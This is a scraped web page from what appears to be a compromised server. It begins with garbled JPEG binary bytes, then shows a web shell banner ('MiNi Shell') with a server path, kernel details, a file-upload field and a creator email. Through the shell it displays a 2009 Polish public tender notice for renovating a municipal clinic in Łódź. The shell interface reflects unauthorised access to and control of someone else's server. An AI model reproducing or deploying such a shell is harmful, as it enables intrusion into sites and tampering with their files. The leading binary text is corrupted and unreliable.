JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090707/227308-N-2009.html

<p class="kh_header"><b>Łódź: REMONT  BUDYNKU MIEJSKIEJ  PRZYCHODNI CHOJNY
93 - 311 ŁÓDŹ, UL. RZGOWSKA 170.</b><br>
<b>Numer ogłoszenia: 227308 - 2009; data zamieszczenia: 07.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejska Przychodnia "Chojny" , ul. Rzgowska 170, 93-311 Łódź, woj. łódzkie, tel. 042 6459190, faks 042 6468544.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpchojny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT  BUDYNKU MIEJSKIEJ  PRZYCHODNI CHOJNY
93 - 311 ŁÓDŹ, UL. RZGOWSKA 170..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są  następujące  zadania :
1 - prace  remontowe  na  parterze.
2 - prace  remontowe  na  I  piętrze.
3 - prace  remontowe  klatki  schodowej.
        4 - prace  remontowe  ogrodzenia  posesji.	
Wraz z zapewnieniem gwarancji  na  wykonane  prace  przez  okres  3  lat. 
Okres  gwarancji  na  użyte  materiały  i  urządzenia  określają  dokumenty  gwarancyjne, które  Wykonawca  zobowiązany  jest  dostarczyć  Zamawiającemu

Zakres prac obejmuje w szczególności:

Ad.  1	Zakres prac remontowych dla parteru:
1.	Hall  (od  drzwi  wejściowych  do  wejścia  do  sali  sprzedaży  apteki): 
	Malowanie  olejne  do  wysokości  obecnej  lamperii - około  1,6 m ,  powyżej malowanie  emulsyjne  ściany  i  sufitu .  Skrobanie  ścian  i  szpachlowanie bez  gładzi . 
	Instalacja  ścianki  gipsowo  kartonowej  maskującej  rury  CO . 
	Instalacja  listew  maskujących  dla  przewodów  elektrycznych  pod  sufitem .
2.	Komunikacja  i  hall  prowadzące  do  poradni  dla  dzieci :
	malowanie
3.	Poczekalnia: 
	malowanie 
	cokół  z  glazury  na  wysokość  1  płytki  przy  ladzie  rejestracyjnej  i  na około  10 cm  w  pozostałej  części  pomieszczenia .
4.	Rejestracja:
	malowanie
5.	wymiana podłogi (
6.	Pomieszczenia socjalne za rejestracją:
	malowanie
	wymiana  podłogi

Ad.  2     Zakres prac remontowych na I piętrze 
1.	Hall 
	malowanie  lamperia  olejna  na  wysokość  1,6  m ,
2.	Ginekologia - pomieszczenia  z  wyłączeniem  pokoi  socjalnych
	malowanie  lamperia  olejna  na  wysokość  2 m .
Ad.   3    Zakres  pozostałych  prac  remontowych  wewnętrznych  w  poradni:
Klatki  schodowe - malowanie  ścian  i  sufitów .

Ad.  4      Ogrodzenie: 
Wymiana  części  metalowych  ogrodzenia ,  z  naprawą  fundamentu ,  osadzenie nowych  słupków  do  bramy  i  montaż  nowej  bramy.
Naprawa  ogrodzenia  od  strony  mieszkania  służbowego ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.26.23.21-7, 45.23.32.51-3, 45.41.00.00-4, 45.42.10.00-4, 45.44.21.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy:
1. Posiadają uprawnienia do wykonywania działalności lub czynności jeśli ustawy 	nakładają obowiązek posiadania takich uprawnień. 

2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 	osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie 	innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do 	wykonania zamówienia. 
	
3)  Wykażą  wykonanie w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  minimum 1 zamówienie o  podobnym  charakterze, odpowiadające swoim rodzajem i wartością niniejszemu zamówieniu           (z podaniem ich wartości oraz daty i miejsca wykonania) oraz załączy dokumenty potwierdzające, że zamówienia te zostały wykonane należycie  - z wykorzystaniem wzoru stanowiącym Załącznik Nr 4 do SIWZ; 
wymagane jest wykazanie wykonania w wymienionym okresie min 1 zamówienia 

	W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oceniana będzie ich łączna wiedza i doświadczenie.

4)  Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 u. Pzp;
	
5) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 	zamówienia tj. są ubezpieczeni od odpowiedzialności cywilnej w zakresie  	prowadzonej   działalności. 
	
	W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oceniana będzie odrębnie dla każdego Wykonawcy jego sytuacja  ekonomiczna i finansowa..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, tj.:
a)	kierownika budowy w specjalności ogólnobudowlanej,
	Należy załączyć dokument uprawnień oraz zaświadczenie z właściwej izby samorządu 	zawodowego, potwierdzające przynależność do izby samorządu
j)	Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zgodnie z zapisami pkt 8.5 SIWZ.
k)	aktualną  informację  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w art. 24 ust. 1 pkt. 4 - 8 ustawy p. z. p. wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
l)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy p. z. p.  wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - dotyczy podmiotu zbiorowego,
m)	aktualne  zaświadczenie  właściwego  naczelnika  urzędu  skarbowego oraz że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenia że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
n)	aktualnego zaświadczenia właściwego oddziału ZUS-u lub KRUS-u potwierdzającego odpowiednio, że Wykonawca nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenia że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,

o)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosownie  do  treści  Rozporządzenia  Prezesa  Rady  Ministrów  z  dnia  19  maja  2006  roku  w  sprawie  dokumentów  jakie  może  żądać  Zamawiający  od  Wykonawcy  oraz  form  w  jakiej  te  dokumenty  mogą  być  składane  zamiast dokumentów, o których mowa powyżej  w:

1)	pkt III.1. l, m, n) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
	a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	b) nie  zalega  z  uiszczeniem  podatków, opłat, składek  na  ubezpieczenie  	społeczne  i  zdrowotne  albo,  że  uzyskał  przewidziane  prawem  zwolnienie, 	odroczenie  lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  	całości  wykonania  decyzji  właściwego  organu;
	c)  nie  orzeczono  wobec  niego  zakazu  ubiegania  się  o  zamówienie;
      2) pkt  III.1.k)  składa  zaświadczenie  właściwego  organu  sądowego  lub  	administracyjnego  kraju  pochodzenia  albo  zamieszkania  osoby, której  	dokumenty  dotyczą, w  zakresie  określonym  w  art. 24 ust. 1 pkt 4-8 u.p.z.p.  3) Dokumenty, o których mowa powyżej w pkt III.o.1.a i c oraz w pkt III.o.2 	powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem 	terminu składania ofert. Natomiast dokument, o  którym  mowa  powyżej  w                         	pkt. III.o.1.b powinien  być  wystawiony  nie  wcześniej  niż  3 miesiące 	przed upływem terminu składania ofert.

2)  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym lub  administracyjnym, albo  organem  samorządu  zawodowego  lub  gospodarczego  odpowiedniego  kraju  pochodzenia  osoby  lub  kraju, w  którym  Wykonawca  ma  siedzibę  lub  miejsce  zamieszkania. Postanowienia  pkt III.o.3)  niniejszej  SIWZ  znajdują  odpowiednie  zastosowanie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mpchojny.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ  można pobierać od pon. do piątku w godzinach od 8.00 do 15.00 II  piętro, pok. nr 223 po wcześniejszym wpłaceniu w kasie pokój nr  222,  kwoty brutto  30,00 zł - opłata za SIWZ..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 11:00, miejsce: Miejska Przychodnia Chojny
93 - 311 Łódź, ul. Rzgowska 170.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com